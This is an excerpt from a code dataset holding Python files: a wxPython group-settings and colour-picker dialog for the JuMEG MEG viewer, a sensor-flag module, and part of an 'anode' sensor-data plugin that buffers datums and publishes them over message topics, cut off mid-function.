id
stringlengths 1
265
| text
stringlengths 6
5.19M
| dataset_id
stringclasses 7
values |
---|---|---|
144730 | #!/usr/bin/env python3
# -+-coding: utf-8 -+-
#--------------------------------------------
# Authors: <NAME> <<EMAIL>>
#
#--------------------------------------------
# Date: 05.09.19
#--------------------------------------------
# License: BSD (3-clause)
#--------------------------------------------
# Updates
#--------------------------------------------
import numpy as np
import wx
import sys,logging
from jumeg.base import jumeg_logger
logger = logging.getLogger('jumeg')
from jumeg.gui.wxlib.utils.jumeg_gui_wxlib_utils_controls import JuMEG_wxControlGrid
from jumeg.gui.tsv.wxutils.jumeg_tsv_wxutils import DLGButtonPanel
__version__="2019-09-13-001"
LEA = wx.ALIGN_LEFT | wx.EXPAND | wx.ALL
class PopupColourTable(wx.PopupTransientWindow):
def __init__(self, parent,**kwargs):
super().__init__(parent,wx.NO_BORDER)
self._wx_init(**kwargs)
self._ApplyLayout()
def _wx_init(self,**kwargs):
self.SetBackgroundColour(kwargs.get("bg","GREY60"))
w = kwargs.get("w",24)
self._C = kwargs.get("colours")
self._caller = kwargs.get("caller")
self._callback = kwargs.get("callback")
self._title = kwargs.get("title","JuMEG Select Colour")
self._colour_text = None
bmp = wx.Bitmap()
ctrls = []
for i in range( self._C.n_colours ):
#--- select colour
ctrls.append( ["BTBMP",self._C.labels[i],bmp,(w,w),wx.NO_BORDER|wx.BU_NOTEXT,self._C.colours[i] ,self._C.labels[i],self.ClickOnCtrls] )
#--- calc cols for grid
n_cols,rest = divmod( len(ctrls),4)
if rest: n_cols += 1
self._pnl = JuMEG_wxControlGrid(self,label= self._title,control_list=ctrls,cols=n_cols,set_ctrl_prefix=False)
def ClickOnCtrls(self,evt):
obj = evt.GetEventObject()
try:
if obj.GetToolTip():
self._colour_text = obj.GetToolTipText()
#--- call the caller-function in parent
if self._colour_text:
self._callback( self._caller,self._colour_text )
#--- close
self.Dismiss() # close it
except:
logger.exception("---> ERROR can not set ToolTip".format(self._colour_text))
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self._pnl,1,LEA,2)
self.SetAutoLayout(True)
self.SetSizer(vbox)
self.Fit()
self.Layout()
class GroupDLG(wx.Dialog):
"""
Example:
---------
input group dict
labels = ['grad','mag','eeg','stim','eog','emg','ecg','ref_meg']
grp={
'mag': {"selected":True,"colour":"RED", "prescale":200,"unit":"fT"},
'grad': {"selected":True,"colour":"BLUE", "prescale":200,"unit":"fT"},
'ref_meg':{"selected":True,"colour":"GREEN", "prescale":2, "unit":"pT"},
'eeg': {"selected":True,"colour":"BLUE", "prescale":1, "unit":"uV"},
'eog': {"selected":True,"colour":"PURPLE", "prescale":100,"unit":"uV"},
'emg': {"selected":True,"colour":"DARKORANGE","prescale":100,"unit":"uV"},
'ecg': {"selected":True,"colour":"DARKGREEN", "prescale":100,"unit":"mV"},
'stim': {"selected":True,"colour":"CYAN", "prescale":1, "unit":"bits"}
}
"""
@property
def Group(self): return self._GRP
def __init__(self,parent,**kwargs):
style=wx.CLOSE_BOX|wx.MAXIMIZE_BOX|wx.MINIMIZE_BOX |wx.RESIZE_BORDER
super().__init__(parent,title="JuMEG Group Settings",style=style)
self._init(**kwargs)
def _init(self,**kwargs):
self._GRP = kwargs.get("grp")
self._wx_init(**kwargs)
self._wx_button_box()
self._ApplyLayout()
def _wx_button_box(self):
"""
show DLG cancel apply bts
:return:
"""
self._pnl_button_box = DLGButtonPanel(self,style=wx.SUNKEN_BORDER)
def _wx_init(self,**kwargs):
w = kwargs.get("w",24)
self.SetBackgroundColour(kwargs.get("bg","GREY90"))
self.SetMinSize(( 620,400) )
# self._bt=wx.Button(self,-1,"TEST")
bmp = wx.Bitmap()
ctrls = [ ["STXT","Groups","Groups"], ["STXT","Colour","Colour"], ["STXT","Scale","Scale/Div"],[ "STXT","Unit","Unit"],["STXT","Scale Mode","Scale Mode"],["STXT","DC Offset","DC Offset"]]
n_cols= len(ctrls)
for grp in self._GRP.labels:
g = grp.upper()
#--- ckbutton select group
ctrls.append( ["CK", g+".SELECTED",g,self._GRP.GetSelected(grp),'de/select group',self.ClickOnCtrls] )
#--- select colour
label = self._GRP.GetColour(grp)
ctrls.append( ["BTBMP",g+".colour",bmp,(w,w),wx.NO_BORDER|wx.BU_NOTEXT,label,label +"\nclick to change",self.ClickOnCtrls] )
#--- grp prescale
ctrls.append(["COMBO",g.upper()+".PRESCALE",str(self._GRP.GetPreScale(grp)),self._GRP.Unit.prescales,'set scaling',self.ClickOnCtrls])
#--- grp unit wit prefix e.g. m,u,n,p,f,a => mT,uT,...
self._GRP.Unit.unit = self._GRP.GetUnit(grp) # update Unit CLS
ctrls.append(["COMBO",g+".UNIT",self._GRP.Unit.unit,self._GRP.Unit.GetUnits(),'set scaling unit',self.ClickOnCtrls])
#--- grp scale mode
m = self._GRP.ScaleModes[ self._GRP.GetScaleMode(grp) ]
ctrls.append( ["COMBO",g.upper() + ".SCALE",m,self._GRP.ScaleModes,'scale on Custom or MinMax',self.ClickOnScaleMode])
#--- combo select DCoffset
# ctrls.append( ["CK", g+".DCOFFSET","",self._GRP.GetDCoffset(grp),'DC Offset',self.ClickOnCtrls] )
m = self._GRP.DCOffsetModes[ self._GRP.GetDCOffsetMode(grp) ]
ctrls.append( ["COMBO",g.upper() + ".DCOFFSET",m,self._GRP.DCOffsetModes,'DC Offset Modes e.g.: [None,Global,Time Window]',self.ClickOnCtrls])
self._pnl_groups = JuMEG_wxControlGrid(self,label="Group Parameter",control_list=ctrls,cols=n_cols,set_ctrl_prefix=False,AddGrowableCol=[2,3,4,5])
#self._bt.Bind(wx.EVT_BUTTON,self.ClickOnButton)
def _popup_colour_table(self,obj,grp):
PCT = PopupColourTable(self,title="Group: "+obj.GetName().split(".")[0],caller=obj,colours=self._GRP.Colour,callback=self.update_colour)
pos = wx.GetMousePosition()
PCT.Position(pos,(0,0))
PCT.Popup()
def update_colour(self,obj,label):
"""
sets the group colour
this is the callback executed from PopupColourTable
may use wx.EVENTS or pubsub
:param obj: colour bitmapbutton
:param label:colour label: RED,GREEN has to be in colour-object label list ...
:return:
"""
grp,key = obj.GetName().lower().split(".")
c = self._GRP.Colour.label2colour(label)
obj.SetBackgroundColour( c )
obj.SetToolTipString( label+"\nclick to change")
self._GRP.SetColour( grp, label )
# logger.info("set group: {} colour: {}".format(grp,self._GRP.GetGroup(grp) ))
def ClickOnScaleMode(self,evt):
"""
update scale mode in group obj
if <division> enable "PRESCALE","UNIT"
else disable
:param evt:
:return:
"""
obj = evt.GetEventObject()
grp,key = obj.GetName().lower().split(".")
idx = obj.GetSelection()
self._GRP.SetScaleMode(grp,idx)
for label in ["PRESCALE","UNIT"]:
w = self.FindWindowByName(grp.upper() + "." + label)
w.Enable( not bool(idx) )
def ClickOnCtrls(self,evt):
obj = evt.GetEventObject()
grp,key = obj.GetName().lower().split(".")
if key == "colour":
self._popup_colour_table(obj,grp)
return
v = obj.GetValue()
if key == "selected":
self._GRP.SetSelected(grp,v )
elif key == "prescale":
self._GRP.SetPreScale(grp,v)
elif key == "unit":
self._GRP.SetUnit(grp,v)
elif key =="dcoffset":
self._GRP.SetDCOffsetMode(grp,obj.GetSelection())
def ClickOnButton(self,evt):
pass
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
#vbox.Add(self._bt,0,LEA,2)
vbox.Add(self._pnl_groups,1,LEA,2)
#--- fix size to show combos of scale and unit
stl = wx.StaticLine(self,size=(520,2) )
stl.SetBackgroundColour("GREY85")
vbox.Add(stl,0,LEA,1)
vbox.Add(self._pnl_button_box,0,LEA,2)
self.SetAutoLayout(True)
self.SetSizer(vbox)
self.Fit()
self.Layout()
class ChannelDLG(GroupDLG):
def __init__(self,**kwargs):
super().__init__(**kwargs)
class MainFrame(wx.Frame):
def __init__(self, parent, title,**kwargs):
super().__init__(parent, title = title)
self._init(**kwargs)
self._ApplyLayout()
def _init(self,**kwargs):
self.test = wx.Panel(self)
self.show_group_dialog(**kwargs)
self.Close()
def _ApplyLayout(self):
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(self.test,1,LEA,4)
self.SetSizer(vbox)
self.SetAutoLayout(True)
self.Fit()
self.Show(True)
def show_group_dialog(self,**kwargs):
dlg = GroupDLG(self,**kwargs)
out = dlg.ShowModal()
if out == wx.ID_APPLY:
grp = dlg.Group.GetGroup(None)
for g in grp.keys():
logger.info("OUTPUT: {} => {} \n {}".format(g,dlg.Group.GetScaling(g),grp.get(g)))
dlg.Destroy()
if __name__ == "__main__":
opt=None
#--- Testing DEBUG
from tsv.utils.jumeg_tsv_utils_io_data import JuMEG_TSV_Utils_IO_Data
from tsv.plot.jumeg_tsv_plot2d_data_options import JuMEG_TSV_PLOT2D_DATA_OPTIONS,GroupOptions
# from tsv.wxutils.jumeg_tsv_wxutils_dlg_settings import GroupDLG,ChannelDLG
verbose = True
path = "data"
path = "~/MEGBoers/programs/JuMEG/jumeg-py/jumeg-py-git-fboers-2019-08-21/projects/JuMEGTSV/data"
fname = '200098_leda_test_10_raw.fif'
raw = None
jumeg_logger.setup_script_logging(name="JuMEG",opt=opt,logger=logger)
IO = JuMEG_TSV_Utils_IO_Data()
raw,bads = IO.load_data(raw,fname,path)
#--- ToDo use only groups from raw
GRP = GroupOptions()
DOpt = JuMEG_TSV_PLOT2D_DATA_OPTIONS(raw=raw)
DOpt.update(verbose=True,debug=True)
app = wx.App()
MainFrame(None,'JuMEG demo',grp=GRP)
app.MainLoop()
| StarcoderdataPython |
188115 | <reponame>henryse/pi-weather-pro
# device present global variables
DS3231_Present = False
BMP280_Present = False
AM2315_Present = False
ADS1015_Present = False
ADS1115_Present = False
| StarcoderdataPython |
3292861 | <filename>asystem-anode/src/main/python/anode/plugin/plugin.py
from __future__ import print_function
import HTMLParser
import StringIO
import abc
import base64
import calendar
import datetime
import decimal
import io
import json
import logging
import numbers
import operator
import os.path
import re
import shutil
import time
import urllib
from StringIO import StringIO
from collections import deque
from decimal import Decimal
from functools import reduce
from importlib import import_module
from uuid import getnode as get_mac
import avro
import avro.io
import avro.schema
import avro.schema
import dill
import matplotlib
import matplotlib.pyplot as plot
import numpy
import pandas
import treq
import xmltodict
from avro.io import AvroTypeException
from cycler import cycler
from matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas
from matplotlib.figure import Figure
from sklearn.externals import joblib
from twisted.internet.task import Clock
from twisted_s3 import auth
import anode
import anode.plugin
from anode.application import *
# noinspection PyTypeChecker,PyUnboundLocalVariable
class Plugin(object):
def poll(self):
if self.has_poll:
log_timer = anode.Log(logging.DEBUG).start()
self._poll()
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.poll)
def push(self, content, targets=None):
if self.has_push:
log_timer = anode.Log(logging.DEBUG).start()
self._push(content, targets)
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.push)
def repeat(self, force=False):
log_timer = anode.Log(logging.DEBUG).start()
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
datums = self.datums[datum_metric][datum_type][datum_unit][datum_bin]
if DATUM_QUEUE_LAST in datums and DATUM_QUEUE_HISTORY in datums:
datum = datums[DATUM_QUEUE_LAST]
if datum["data_temporal"] != "derived":
datum_bin_timestamp = self.get_time()
if force and "history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
datum_bin_timestamp = self.get_time_period(datum_bin_timestamp, Plugin.get_seconds(
self.config["history_partition_seconds"], "second"))
if force or ((24 * 60 * 60) > (datum_bin_timestamp - datum["bin_timestamp"]) >= (
self.config["repeat_seconds"] - 5)):
def expired_max_min(max_or_min):
if max_or_min in self.datums[datum_metric][datum_type][datum_unit][datum_bin]:
if force or datums[max_or_min]["bin_timestamp"] < \
self.get_time_period(self.get_time(),
Plugin.get_seconds(datums[max_or_min]["bin_width"],
datums[max_or_min]["bin_unit"])):
return True
return False
datum_value = datum["data_value"]
if force and "history_partition_seconds" in self.config and self.config[
"history_partition_seconds"] > 0 and \
Plugin.get_seconds(datum["bin_width"], datum["bin_unit"]) == \
Plugin.get_seconds(self.config["history_partition_seconds"], "second"):
if datum["data_type"] == "integral":
datum_value = 0
if datum_value is not None:
self.datum_push(
datum["data_metric"],
"forecast" if datum["data_temporal"] == "forecast" else "repeat", datum["data_type"],
datum_value,
datum["data_unit"],
datum["data_scale"],
datum["data_timestamp"],
datum_bin_timestamp,
datum["bin_width"],
datum["bin_unit"],
data_string=datum["data_string"] if "data_string" in datum else None,
data_derived_max=expired_max_min(DATUM_QUEUE_MAX),
data_derived_min=expired_max_min(DATUM_QUEUE_MIN),
data_derived_force=force,
data_push_force=True
)
self.publish()
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.repeat)
def publish(self):
metric_name = "anode__" + self.name + "__"
time_now = self.get_time()
metrics_count = sum(len(units)
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values())
self.datum_push(
metric_name + "metrics",
"current", "point",
self.datum_value(metrics_count),
"scalar",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
datums_buffer_count = sum(len(bins[DATUM_QUEUE_BUFFER])
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
self.datum_push(
metric_name + "buffer",
"current", "point",
self.datum_value(0 if metrics_count == 0 else (float(datums_buffer_count) / (self.datums_buffer_batch * metrics_count) * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
datums_count = sum(0 if DATUM_QUEUE_HISTORY not in bins else (
sum(len(partitions["data_df"].index) for partitions in bins[DATUM_QUEUE_HISTORY].values()))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values())
self.datum_push(
metric_name + "history",
"current", "point",
self.datum_value(0 if ("history_ticks" not in self.config or self.config["history_ticks"] < 1) else (
float(datums_count) / self.config["history_ticks"] * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
partitions_count_max = 0 if len(self.datums) == 0 else (max(0 if DATUM_QUEUE_HISTORY not in bins else (
len(bins[DATUM_QUEUE_HISTORY]))
for metrics in self.datums.values()
for types in metrics.values()
for units in types.values()
for bins in units.values()))
self.datum_push(
metric_name + "partitions",
"current", "point",
self.datum_value(0 if ("history_partitions" not in self.config or self.config["history_partitions"] < 1) else (
float(partitions_count_max) / self.config["history_partitions"] * 100)),
"_P25",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_upper=100,
data_bound_lower=0,
data_transient=True
)
self.datum_push(
metric_name + "up_Dtime",
"current", "point",
self.datum_value((time_now - self.time_boot) / Decimal(24 * 60 * 60), factor=100),
"d",
100,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
self.datum_push(
metric_name + "last_Dseen",
"current", "point",
self.datum_value(self.time_seen),
"scalar",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_transient=True
)
datums_publish_pending = 0
publish_service = self.config["publish_service"] if "publish_service" in self.config else None
publish_batch_datum_topic = self.config["publish_batch_datum_topic"] if "publish_batch_datum_topic" in self.config else None
for datum_metric in self.datums:
for datum_type in self.datums[datum_metric]:
for datum_unit in self.datums[datum_metric][datum_type]:
for datum_bin in self.datums[datum_metric][datum_type][datum_unit]:
datums_publish = self.datums[datum_metric][datum_type][datum_unit][datum_bin][DATUM_QUEUE_PUBLISH]
datums_publish_len = len(datums_publish)
if publish_service is not None and publish_batch_datum_topic is not None:
if publish_service.isConnected():
for index in xrange(datums_publish_len):
datum_avro = datums_publish.popleft()
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] publishing datum [{}] datum [{}] of [{}]".format(
self.name, self.datum_tostring(self.datum_avro_to_dict(datum_avro)[0]),
index + 1, datums_publish_len))
publish_service.publishMessage(publish_batch_datum_topic + PUBLISH_BATCH_TOPIC,
datum_avro, datums_publish, 1, False, lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum [{}] with reason {}".format(
self.name, self.datum_tostring(self.datum_avro_to_dict(datum_avro)[0]),
str(failure).replace("\n", ""))), queue.appendleft(message)))
elif publish_service is None:
datums_publish.clear()
datums_publish_pending += len(datums_publish)
self.datum_push(
metric_name + "queue",
"current", "point",
self.datum_value(datums_publish_pending),
"datums",
1,
time_now,
time_now,
self.config["poll_seconds"],
"second",
data_bound_lower=0,
data_transient=True
)
anode.Log(logging.INFO).log("Plugin", "state", lambda: "[{}] published [{}] datums".format(self.name, datums_publish_pending))
def datum_push(self, data_metric, data_temporal, data_type, data_value, data_unit, data_scale, data_timestamp, bin_timestamp, bin_width,
bin_unit, asystem_version=None, data_version=None, data_string=None, data_bound_upper=None, data_bound_lower=None,
data_derived_max=False, data_derived_min=False, data_derived_period=1, data_derived_unit="day",
data_derived_force=False, data_push_force=False, data_transient=False):
log_timer = anode.Log(logging.DEBUG).start()
if data_value is not None:
datum_dict = {
"asystem_version": APP_VERSION_NUMERIC if asystem_version is None else Plugin.datum_version_encode(asystem_version),
"data_version": 0 if data_version is None else Plugin.datum_version_encode(data_version, 1000),
"data_source": self.name,
"data_metric": data_metric,
"data_temporal": data_temporal,
"data_type": data_type,
"data_value": data_value,
"data_unit": data_unit,
"data_scale": data_scale,
"data_string": data_string,
"data_timestamp": data_timestamp,
"bin_timestamp": bin_timestamp,
"bin_width": bin_width,
"bin_unit": bin_unit
}
if data_bound_upper is not None and data_value > Decimal(data_bound_upper * data_scale):
datum_dict["data_value"] = data_bound_upper * data_scale
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] upperbounded datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
if data_bound_lower is not None and data_value < Decimal(data_bound_lower * data_scale):
datum_dict["data_value"] = data_bound_lower * data_scale
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] lowerbounded datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
try:
datum_avro = self.datum_dict_to_avro(datum_dict)[0]
except AvroTypeException as exception:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] error serialising Avro object [{}]".format(self.name, datum_dict), exception)
return
if datum_dict["data_metric"] not in self.datums:
self.datums[datum_dict["data_metric"]] = {}
if datum_dict["data_type"] not in self.datums[datum_dict["data_metric"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]] = {}
if datum_dict["data_unit"] not in self.datums[datum_dict["data_metric"]][datum_dict["data_type"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]] = {}
if str(datum_dict["bin_width"]) + datum_dict["bin_unit"] not in \
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]]:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]] = {
DATUM_QUEUE_PUBLISH: deque(maxlen=(None if "publish_ticks" not in self.config or self.config["publish_ticks"] < 1
else self.config["publish_ticks"])), DATUM_QUEUE_BUFFER: deque()}
if not data_transient:
self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]][DATUM_QUEUE_HISTORY] = {}
datums_deref = self.datums[datum_dict["data_metric"]][datum_dict["data_type"]][datum_dict["data_unit"]][
str(datum_dict["bin_width"]) + datum_dict["bin_unit"]]
if DATUM_QUEUE_LAST not in datums_deref or datums_deref[DATUM_QUEUE_LAST]["data_value"] != datum_dict["data_value"] or \
datums_deref[DATUM_QUEUE_LAST]["data_unit"] != datum_dict["data_unit"] or \
datums_deref[DATUM_QUEUE_LAST]["data_scale"] != datum_dict["data_scale"] or \
("data_string" in datums_deref[DATUM_QUEUE_LAST] and
datums_deref[DATUM_QUEUE_LAST]["data_string"] != datum_dict["data_string"]) or \
("repeat_partition" in self.config and self.config["repeat_partition"] and
self.get_time_period(datums_deref[DATUM_QUEUE_LAST]["bin_timestamp"],
self.config["history_partition_seconds"]) !=
self.get_time_period(datum_dict["bin_timestamp"],
self.config["history_partition_seconds"])) or data_push_force:
self.time_seen = self.get_time()
datums_deref[DATUM_QUEUE_LAST] = datum_dict
bin_timestamp_derived = self.get_time_period(datum_dict["bin_timestamp"],
Plugin.get_seconds(data_derived_period, data_derived_unit))
if not data_transient:
if data_derived_max:
if DATUM_QUEUE_MAX not in datums_deref or datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"] < bin_timestamp_derived \
or datums_deref[DATUM_QUEUE_MAX]["data_value"] < datum_dict["data_value"] or data_derived_force:
datums_deref[DATUM_QUEUE_MAX] = datum_dict.copy()
datums_deref[DATUM_QUEUE_MAX]["bin_type"] = "high"
datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"] = bin_timestamp_derived
datums_deref[DATUM_QUEUE_MAX]["bin_width"] = data_derived_period
datums_deref[DATUM_QUEUE_MAX]["bin_unit"] = data_derived_unit
anode.Log(logging.DEBUG).log("Plugin", "state", lambda: "[{}] selected high [{}]".format(
self.name, self.datum_tostring(datums_deref[DATUM_QUEUE_MAX])))
self.datum_push(data_metric, "derived", "high", datum_dict["data_value"], data_unit, data_scale,
datum_dict["data_timestamp"], datums_deref[DATUM_QUEUE_MAX]["bin_timestamp"],
datum_dict["bin_width"] if datum_dict["data_type"] == "integral"
else data_derived_period, datum_dict["bin_unit"] if datum_dict["data_type"] == "integral"
else data_derived_unit, asystem_version=asystem_version, data_version=data_version,
data_derived_force=data_derived_force, data_push_force=data_push_force,
data_transient=data_transient)
if data_derived_min:
if DATUM_QUEUE_MIN not in datums_deref or datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"] < bin_timestamp_derived \
or datums_deref[DATUM_QUEUE_MIN]["data_value"] > datum_dict["data_value"] or data_derived_force:
datums_deref[DATUM_QUEUE_MIN] = datum_dict.copy()
datums_deref[DATUM_QUEUE_MIN]["bin_type"] = "low"
datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"] = bin_timestamp_derived
datums_deref[DATUM_QUEUE_MIN]["bin_width"] = data_derived_period
datums_deref[DATUM_QUEUE_MIN]["bin_unit"] = data_derived_unit
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] deleted low [{}]".format(self.name,
self.datum_tostring(
datums_deref[DATUM_QUEUE_MIN])))
self.datum_push(data_metric, "derived", "low", datum_dict["data_value"], data_unit, data_scale,
datum_dict["data_timestamp"], datums_deref[DATUM_QUEUE_MIN]["bin_timestamp"],
datum_dict["bin_width"] if datum_dict["data_type"] == "integral"
else data_derived_period, datum_dict["bin_unit"] if datum_dict["data_type"] == "integral"
else data_derived_unit, asystem_version=asystem_version, data_version=data_version,
data_derived_force=data_derived_force, data_push_force=data_push_force,
data_transient=data_transient)
if not datum_dict["data_temporal"] == "derived":
datums_deref[DATUM_QUEUE_PUBLISH].append(datum_avro)
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
bin_timestamp_partition = self.get_time_period(datum_dict["bin_timestamp"],
self.config["history_partition_seconds"])
if len(datums_deref[DATUM_QUEUE_BUFFER]) == self.datums_buffer_batch or bin_timestamp_partition \
not in datums_deref[DATUM_QUEUE_HISTORY]:
self.datum_merge_buffer_history(datums_deref[DATUM_QUEUE_BUFFER], datums_deref[DATUM_QUEUE_HISTORY])
datums_deref[DATUM_QUEUE_BUFFER].append(datum_dict)
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] saved datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] pushed datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
self.anode.push_datums({"dict": [datum_dict]})
if not datum_dict["data_metric"].startswith("anode") and \
datum_dict["data_type"] != "low" and \
datum_dict["data_type"] != "high" and \
datum_dict["bin_unit"] != "all_Dtime":
publish_service = self.config["publish_service"] if "publish_service" in self.config else None
publish_push_data_topic = self.config["publish_push_data_topic"] \
if "publish_push_data_topic" in self.config else None
publish_push_metadata_topic = self.config["publish_push_metadata_topic"] \
if "publish_push_metadata_topic" in self.config else None
# TODO: Complete publish service
if publish_service is not None and publish_push_data_topic is not None and publish_push_metadata_topic is not None:
if publish_service.isConnected():
datum_dict_decoded = Plugin.datum_decode(datum_dict)
datum_id = Plugin.datum_encode_id(datum_dict)
datum_guid = Plugin.datum_encode_guid(datum_dict)
datum_name = Plugin.datum_decode_label(datum_dict_decoded)
datum_data_topic = "{}/sensor/anode/{}/state".format(publish_push_data_topic, datum_id)
if datum_guid in PUBLISH_METADATA_CACHE and PUBLISH_METADATA_CACHE[datum_guid] != datum_id:
anode.Log(logging.ERROR).log("Plugin", "error",
lambda: "[{}] attempting to publish datum with GUID [{}] and ID [{}] "
"when previously published with ID [{}]".format(
self.name, datum_guid, datum_id, PUBLISH_METADATA_CACHE[datum_guid]))
if datum_guid not in PUBLISH_METADATA_CACHE:
datum_metadata_topic = "{}/sensor/anode/{}/config".format(publish_push_metadata_topic, datum_id)
datum_metadata = {
"unique_id": datum_id,
"name": datum_name,
"value_template": "{{value_json.value}}",
"unit_of_measurement": datum_dict_decoded["data_unit"],
"device": {
"name": "ANode",
"model": "ASystem",
"manufacturer": "<NAME>",
"identifiers": ID_HEX,
"connections": [["mac", ID_HEX_STRING]],
"sw_version": APP_MODEL_VERSION
},
"qos": 1,
"state_topic": datum_data_topic
}
publish_service.publishMessage(datum_metadata_topic, json.dumps(datum_metadata), None, 1, True,
lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum metadata [{}] with reason {}".format(
self.name, datum_metadata, str(failure).replace("\n", ""))), None))
PUBLISH_METADATA_CACHE[datum_guid] = datum_id
datum_data = {"value": float(int(datum_dict["data_value"]) / Decimal(datum_dict["data_scale"]))}
publish_service.publishMessage(datum_data_topic, json.dumps(datum_data), None, 1, False,
lambda failure, message, queue: (
anode.Log(logging.WARN).log("Plugin", "state", lambda:
"[{}] publish failed datum data [{}] with reason {}".format(
self.name, datum_data, str(failure).replace("\n", ""))), None))
else:
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] dropped datum [{}]".format(self.name, self.datum_tostring(datum_dict)))
log_timer.log("Plugin", "timer", lambda: "[{}]".format(self.name), context=self.datum_push)
def datum_merge_buffer_history(self, datums_buffer, datums_history):
log_timer = anode.Log(logging.DEBUG).start()
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
bin_timestamp_partition_max = None
if len(datums_buffer) > 0:
datums_buffer_partition = {}
for datum in datums_buffer:
bin_timestamp_partition = self.get_time_period(datum["bin_timestamp"], self.config["history_partition_seconds"])
bin_timestamp_partition_max = bin_timestamp_partition if \
(bin_timestamp_partition_max is None or bin_timestamp_partition_max < bin_timestamp_partition) else \
bin_timestamp_partition_max
if bin_timestamp_partition not in datums_buffer_partition:
datums_buffer_partition[bin_timestamp_partition] = []
datums_buffer_partition[bin_timestamp_partition].append(datum)
for bin_timestamp_partition, datums in datums_buffer_partition.iteritems():
datums_df = self.datums_dict_to_df(datums_buffer)
if len(datums_df) != 1:
raise ValueError("Assertion error merging mixed datum types when there should not be any!")
datums_df = datums_df[0]
if bin_timestamp_partition not in datums_history:
datums_history[bin_timestamp_partition] = datums_df
else:
datums_history[bin_timestamp_partition]["data_df"] = pandas.concat(
[datums_history[bin_timestamp_partition]["data_df"],
datums_df["data_df"]], ignore_index=True)
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] merged buffer partition [{}]".format(self.name, bin_timestamp_partition))
datums_buffer.clear()
if len(datums_history) > 0 and bin_timestamp_partition_max is not None:
bin_timestamp_partition_lower = bin_timestamp_partition_max - \
(self.config["history_partitions"] - 1) * self.config["history_partition_seconds"]
for bin_timestamp_partition_del in datums_history.keys():
if bin_timestamp_partition_del < bin_timestamp_partition_lower:
del datums_history[bin_timestamp_partition_del]
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] purged expired partition [{}]".format(self.name,
bin_timestamp_partition_del))
while len(datums_history) > self.config["history_partitions"] or \
sum(len(datums_df_cached["data_df"].index) for datums_df_cached in datums_history.itervalues()) > \
self.config["history_ticks"]:
bin_timestamp_partition_del = min(datums_history.keys())
del datums_history[bin_timestamp_partition_del]
anode.Log(logging.DEBUG).log("Plugin", "state",
lambda: "[{}] purged upperbounded partition [{}]".format(self.name,
bin_timestamp_partition_del))
log_timer.log("Plugin", "timer", lambda: "[{}] partitions [{}]".format(self.name, len(datums_history)),
context=self.datum_merge_buffer_history)
def datum_merge_history(self, datums_history, datum_filter):
log_timer = anode.Log(logging.DEBUG).start()
datums = []
if "history_ticks" in self.config and self.config["history_ticks"] > 0 and \
"history_partitions" in self.config and self.config["history_partitions"] > 0 and \
"history_partition_seconds" in self.config and self.config["history_partition_seconds"] > 0:
datums_partitions = []
if "partitions" in datum_filter:
datum_filter_partitions = 0 if not min(datum_filter["partitions"]).isdigit() else int(min(datum_filter["partitions"]))
if datum_filter_partitions > 0 and len(datums_history) > 0:
for datums_partition in sorted(datums_history.iterkeys())[(
(len(datums_history) - datum_filter_partitions) if len(datums_history) > datum_filter_partitions else 0):]:
